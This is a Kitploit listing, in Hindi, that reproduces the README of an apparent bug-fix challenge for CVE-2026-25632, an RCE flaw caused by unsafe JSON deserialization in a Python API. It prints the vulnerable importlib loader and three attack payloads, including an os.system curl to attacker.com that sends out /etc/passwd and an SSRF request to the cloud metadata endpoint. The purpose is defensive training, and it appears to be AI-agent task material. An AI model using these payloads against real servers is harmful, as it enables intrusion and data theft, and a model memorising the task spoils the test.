Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-25632 — CVE-2026-25632 — रिमोट कोड निष्पादन की ओर ले जाने वाले असुरक्षित JSON डिसीरियलाइज़ेशन को ठीक करें | Kitploit
उपकरण/GitHubGitHub/lazarus0x1337/cve-2026-25632
स्थैतिक विश्लेषणभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब सुरक्षालर्निंग और शिक्षालैब और अभ्यास
GitHublazarus0x1337/cve-2026-25632

CVE-2026-25632

CVE-2026-25632 — रिमोट कोड निष्पादन की ओर ले जाने वाले असुरक्षित JSON डिसीरियलाइज़ेशन को ठीक करें

रिपॉजिटरी देखें
131 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-25632 — REST API में JSON डिसीरियलाइज़ेशन RCE (बगफिक्स चुनौती)

एक वास्तविक 2026 भेद्यता (CVSS 10.0, सक्रिय रूप से शोषित) से प्रेरित
आधार: CVE-2026-25632 — EPyT-Flow जल-नेटवर्क सिमुलेशन REST API में असुरक्षित __type__-आधारित JSON डिसीरियलाइज़ेशन के माध्यम से रिमोट कोड निष्पादन, जिसे 2026 की शुरुआत में सार्वजनिक रूप से प्रकट किया गया था।


पृष्ठभूमि

NovaSim एक Python-आधारित सिमुलेशन फ्रेमवर्क है जो वैज्ञानिक प्रयोगों के रिमोट नियंत्रण के लिए एक REST API प्रदान करता है। विषम क्लाइंट वातावरणों में लचीले ऑब्जेक्ट सीरियलाइज़ेशन का समर्थन करने के लिए, एक डेवलपर ने एक कस्टम JSON लोडर जोड़ा जो एक विशेष __type__ फ़ील्ड का पता लगाता है और संदर्भित Python क्लास को importlib का उपयोग करके गतिशील रूप से आयात और इंस्टैंशिएट करता है।

यह पैटर्न 2026 में एक प्रमुख ओपन-सोर्स प्रोजेक्ट में क्रिटिकल रिमोट कोड निष्पादन (RCE) भेद्यता के रूप में प्रकट किया गया था। सुरक्षा शोधकर्ताओं ने पहचाना कि एक हमलावर जो JSON बॉडी को नियंत्रित करता है, Python मानक पुस्तकालय में किसी भी कॉलेबल को लक्षित करते हुए एक गैजेट चेन बना सकता है — जिसमें subprocess.Popen, os.system, , और 25+ SSRF गैजेट शामिल हैं — और एक ही HTTP अनुरोध के साथ पूर्ण सर्वर समझौता प्राप्त कर सकता है, ।

eval
बिना किसी प्रमाणीकरण के

आपका कार्य

आपको src/solution.py का भेद्य संस्करण दिया गया है, जिसमें वास्तविक असुरक्षित डिसीरियलाइज़ेशन पैटर्न मौजूद है।

आपका लक्ष्य: DeserializationService.load_from_json() में भेद्यता को ठीक करना ताकि:

  1. वैध, अनुमत सूची में शामिल सिमुलेशन ऑब्जेक्ट अभी भी सही ढंग से डिसीरियलाइज़ हों।
  2. अनुमत सूची के बाहर की किसी भी क्लास को लोड करने का प्रयास SecurityError उठाए।
  3. __type__ फ़ील्ड अब मनमाना मॉड्यूल आयात या क्लास इंस्टैंशिएशन सक्षम न करे।
  4. सभी वैध सिमुलेशन डेटा (गैर-__type__ JSON) सामान्य रूप से लोड होता रहे।

तकनीकी समस्या विवरण

भेद्य कोड पैटर्न (उपयोग न करें)

root@kitploit:~
# DANGEROUS — CVE-2026-25632 pattern
import importlib

def _unsafe_load(data: dict):
    if "__type__" in data:
        module_path, class_name = data["__type__"].rsplit(".", 1)
        module = importlib.import_module(module_path)   # attacker-controlled!
        cls = getattr(module, class_name)               # attacker-controlled!
        return cls(**data.get("args", {}))              # arbitrary code execution!

हमले के वेक्टर (वास्तविक सुरक्षा शोध से)

एक हमलावर निम्नलिखित निर्मित JSON बॉडी के साथ POST अनुरोध भेजता है:

वेक्टर 1 — subprocess के माध्यम से सीधा RCE:

root@kitploit:~
{
  "__type__": "subprocess.Popen",
  "args": {"args": ["id"], "shell": true}
}

वेक्टर 2 — os.system के माध्यम से RCE:

root@kitploit:~
{
  "__type__": "os.system",
  "args": {"command": "curl http://attacker.com/exfil?data=$(cat /etc/passwd)"}
}

वेक्टर 3 — urllib.request.urlopen के माध्यम से SSRF:

root@kitploit:~
{
  "__type__": "urllib.request.urlopen",
  "args": {"url": "http://169.254.169.254/latest/meta-data/"}
}

सुरक्षा शोधकर्ताओं ने अकेले Python मानक पुस्तकालय के माध्यम से इस तरह पहुंच योग्य 12 प्रत्यक्ष RCE गैजेट और 25 SSRF गैजेट प्रलेखित किए हैं।


अनुमत सूची में शामिल प्रकार

निम्नलिखित, और केवल निम्नलिखित, सिमुलेशन ऑब्जेक्ट प्रकारों को __type__ के माध्यम से डिसीरियलाइज़ किया जा सकता है:

__type__ मानPython क्लास
simulation.Sensornovasim.models.Sensor
simulation.Actuatornovasim.models.Actuator
simulation.Scenarionovasim.models.Scenario

कोई भी अन्य __type__ मान किसी भी आयात या इंस्टैंशिएशन से पहले तुरंत SecurityError उठाए, यह अनिवार्य है।


इनपुट / आउटपुट विनिर्देश

इनपुट

JSON ऑब्जेक्ट्स जो DeserializationService.load_from_json(raw: str) -> dict | SimObject को प्रस्तुत किए जाते हैं।

आउटपुट

  • यदि JSON में कोई __type__ कुंजी नहीं है: dict लौटाएं (पार्स किया गया JSON)।
  • यदि JSON में अनुमत सूची में शामिल __type__ है: संबंधित सिमुलेशन ऑब्जेक्ट इंस्टेंस लौटाएं।
  • यदि JSON का __type__ अनुमत सूची में शामिल नहीं है: SecurityError उठाएं, संदेश: "Blocked unsafe type: <type_value>"।
  • यदि JSON विकृत है: ValueError उठाएं, संदेश: "Invalid JSON payload"।

किनारे के मामले / त्रुटि प्रबंधन नियम

परिदृश्यअपेक्षित व्यवहार
__type__ अनुपस्थितपार्स करके सादा dict के रूप में लौटाएं
__type__ = "simulation.Sensor"Sensor(**args) इंस्टैंशिएट करें
__type__ = "subprocess.Popen"SecurityError उठाएं
__type__ = "os.system"SecurityError उठाएं
__type__ = "__builtins__.eval"SecurityError उठाएं
__type__ = "" (खाली स्ट्रिंग)SecurityError उठाएं
__type__ = एक list या integerSecurityError उठाएं (अमान्य type फ़ील्ड)
Malformed JSON स्ट्रिंगValueError उठाएं
वैध ऑब्जेक्ट में अतिरिक्त अज्ञात फ़ील्डस्वीकार किए जाते हैं, कंस्ट्रक्टर को kwargs के रूप में पास किए जाते हैं

फ़ाइलें

root@kitploit:~
challenge-cve-2026-25632/
├── README.md                   <- You are here
├── Dockerfile                  <- Deterministic build environment
├── src/
│   ├── solution.py             <- BUGGY starter code (your target)
│   ├── solution_fixed.py       <- Reference solution (hidden from agent)
│   └── novasim/
│       ├── __init__.py
│       └── models.py           <- Allowlisted simulation model classes
└── tests/
    └── test_solution.py        <- Test harness (FAILS on buggy, PASSES on fixed)

सत्यापन मानदंड

फिक्स को निम्नलिखित सभी परीक्षणों को पास करना होगा:

  • सभी 4 मानक डिसीरियलाइज़ेशन परीक्षण (अनुमत सूची में शामिल प्रकार, बिना type वाला सादा dict)
  • सभी 5 हमले-वेक्टर अवरोधन परीक्षण (subprocess, os, eval, urllib, builtins)
  • सभी 3 किनारे-मामले परीक्षण (खाली type, गैर-स्ट्रिंग type, malformed JSON)
  • परीक्षणों के दौरान कोई बाहरी नेटवर्क कॉल नहीं
  • रनों में नियतात्मक (deterministic)

संदर्भ

  • NVD — CVE-2026-25632
  • CISA सलाह — Known Exploited Vulnerabilities Catalog
  • सुरक्षा शोध: 79 गैजेट खोजे गए — MazeHQ, 2026
  • CWE-502: अविश्वसनीय डेटा का डिसीरियलाइज़ेशन
टूल डाउनलोड करें